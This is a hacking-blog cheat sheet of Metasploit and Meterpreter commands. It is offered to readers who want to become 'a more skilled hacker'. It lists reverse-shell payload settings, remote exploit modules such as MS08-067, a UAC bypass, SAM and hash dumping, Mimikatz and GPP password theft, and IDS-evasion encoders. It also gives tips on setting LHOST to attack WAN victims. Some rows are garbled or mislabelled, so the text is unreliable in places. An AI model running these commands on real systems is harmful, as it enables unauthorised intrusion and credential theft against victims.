Home » Metasploit » The Ultimate List Of Best Metasploit Commands

The Ultimate List Of Best Metasploit Commands

metasploit commands to hack

Metasploit is an open source penetration testing framework used by security professionals worldwide. In this article, we’ll show you some of its most powerful commands. Metasploit has been around since 2004, but it still remains one of the best tools available today. We’ll teach you everything you need to know about using it.

Metasploit allows you to perform attacks on remote systems without having physical access to them. It also lets you test network devices like firewalls and routers. Metasploit is an open source penetration testing framework developed by Rapid7. It allows users to perform network attacks against their own systems or other networks.

In this article, we’ll show you some of the most useful commands for Metasploit. We hope these tips help you on your way to becoming a more skilled hacker!

Download Metasploit Pro Framework Free

Passwords are like underwear. Don’t let people see it, change it very often, and you shouldn’t share it with strangers.

Meterpreter Cheat Sheet Commands

CommandDescription of CMD
upload file c:\\windowsMeterpreter uploads file to the Windows target machine
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter downloads the files from Windows target machine
execute -f c:\\windows\temp\exploit.exeMeterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -cCreates a new channel using the cmd shell
psMeterpreter shows you the current processes that are running
shellMeterpreter gets the shell access on the target machine or server
getsystemMeterpreter attempts to do privilege escalation to gain access to the target
hashdumpMeterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r targetMeterpreter creates a port forward to the target machine
portfwd delete –l 3389 –p 3389 –r targetMeterpreter deletes the port forward function

List of Latest Metasploit Commands

  • Meterpreter Payloads:
  • Windows reverse meterpreter payload
CommandDescription of CMD
set payload windows/meterpreter/reverse_tcpWindows reverse tcp payload

Windows VNC payload for Meterpreter

CommandDescription of CMD
set payload windows/vncinject/reverse_tcpset ViewOnly falseMeterpreter Windows VNC Payload 

Linux Reverse Meterpreter payload

CommandDescription of CMD
set payload linux/meterpreter/reverse_tcpMeterpreter Linux Reverse Payload

Common Metasploit Modules and Remote Windows Metasploit Modules

CommandDescription of CMD
use exploit/windows/smb/ms08_067_netapiMS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapiMS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules

CommandDescription of CMD
use exploit/windows/local/bypassuacBypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

CommandDescription of CMD
use auxiliary/scanner/http/dir_scannerMetasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_loginMetasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_versionMetasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_loginMetasploit Oracle Login Module

Read also: The Perfect Guide to DDoS Like a Pro Hacker.

Metasploit Powershell Modules

CommandDescription of CMD
use exploit/multi/script/web_deliveryMetasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershellMetasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployerMetasploit JBOSS deploy
use exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload

 Post Exploit Windows Metasploit Modules

CommandDescription of CMD
run post/windows/gather/win_privsMetasploit show privileges of the current user
use post/windows/gather/credentials/gppMetasploit grab GPP saved passwords
oad mimikatz -> wdigestMetasplit load Mimikatz
run post/windows/gather/local_admin_search_enumIdenitfy other machines that the supplied domain user has administrative access to

Common Metasploit Commands That You Need To Know

Metasploit command for updating Framework:

apt update; apt install metasploit-framework

The command mentioned above provides the latest version of the Metasploit framework. However, running this command might corrupt or break the copy of your software that is installed on your computer.

Metasploit msfconsole:

When you first run the Metasploit, the following window will open on your screen. If you don’t have any previous knowledge or information related to Metasploit, you can simply type “help” into the command line to view all available commands and information.

In order to save time and not overwhelm you with too much information, we will only be explaining the most essential Metasploit commands in this tutorial. With just a basic understanding of these commands, you should be up and running in Metasploit quickly. As you continue to use Metasploit, you will learn more about the advanced options. Also, most command descriptions should be very clear about what the command exactly does and how to use it. For now we will be looking at the most used basic Metasploit commands in this tutorial like:

  • The Basic commands: search, use, back, help, info and exit.
  • Exploit commands: set to set variables and show to show the exploit options, targets, payloads, encoders, nops and the advanced and evasion options.
  • Exploit execution commands: run and exploit to run exploits against a target.

Useful Metasploit commands

Help command

The help command in msfconsole will return a list of possible commands together with a description. When there is an active exploit selected, the help command can be used to get a list of exploit commands.

Info command

The “use” command lets us select an exploit, and the “info” command lets us retrieve information about the selected exploit, like the name, platform, author, available targets, and more. In the screenshot below, we’ve used the info command on an exploit named ie_execcommand_uaf:

Search command

This command is used to search for different types of vulnerabilities and exploits from the msfconsole.

Metasploit currently contains over 1,500 different exploits, with new ones being added all the time. With this many exploits, it’s important to know how to use the search function effectively in order to find the one you need.

The search function can be used by simply typing in the command “search” followed by a search term – for example, if you’re looking for an exploit related to Flash player, you would type in “search flash“. Metasploit will then search for the given search term in the module names and descriptions.

Metasploit Commands

Searching exploits with keywords

The search command can be used with a keyword in order to look for a specific author, OSVDB ID or platform. If you need help finding the right keyword, the ‘help search’ command can be used to display a list of available keywords in msfconsole. Here is an example:

‘help search’

This will return a list of keywords that can be used with the search command.

help search

To search for modules with a CVE ID from 2016, use the following command: search cve:2016

msf > search cve:2016

This query will return all exploits with a CVE ID from 2016, as well as an auxiliary module scanner for the very recent Fortinet firewall SSH backdoor

Show options

With the help of this simple command, we can use show commands to display all the values required by the payload which can further be used to attack the victim PC or machine which we want to attack.

LHOST

This command will help you attack the WAN network. All you need to do is set the LHOST to your static IP address and forward all the other ports.

LPORT

If you want to use a LAN Network, you don’t have to port forward. You can use any port you want. But if you’re attacking a WAN Network, then you need to port forward the port you’re attacking from your router.

metaspolit command cheat sheat

Show Payloads

With the help of this command, we use the show payloads command to return a list of compatible payloads for the exploit. In the picture below, Metasploit has loaded many compatible payloads:

Metasploit Commands List

Show Targets

This command will give you a list of operating systems that are vulnerable to the selected exploit. The output of the exploit is as follows:

adobe_flash_shader_drawing_fill exploit.

Show advanced

By using the show advanced command we can find all of the advanced options for exploits

best-metasploit-commands-cheat-sheet-list/

Show encoders

This command is used to return all of the compatible encoders for payloads. These encoders can help evade simple IDS/IPS signatures that look for certain bytes in the payload.

Show nops

This command will return a list of NOP generators. NOP is the abbreviation for No Operation, and it is used to change the pattern to bypass simple IDS/IPS of common NOP sleds. These NOP generators are named after the CPU Architecture they’re configured for.

Show evasion

This show evasion command returns a list of available evasion techniques.

List of full A-Z Metasploit commands.

Conclusion

I hope this guide will be really helpful for you. Share it with your friends and family to help them solve their problems. If you have any questions, then leave them in the comment section. We are always here to help you if you need any help.

4 thoughts on “The Ultimate List Of Best Metasploit Commands

  1. Hey there just wanted to give you a quick heads up. The text in your article seem to be running off the screen in Chrome. I’m not sure if this is a formatting issue or something to do with web browser compatibility but I figured I’d post to let you know. The style and design look great though! Hope you get the issue resolved soon. Thanks

  2. Thanks for sharing. I read many of your blog posts, cool, your blog is very good.

Leave a Reply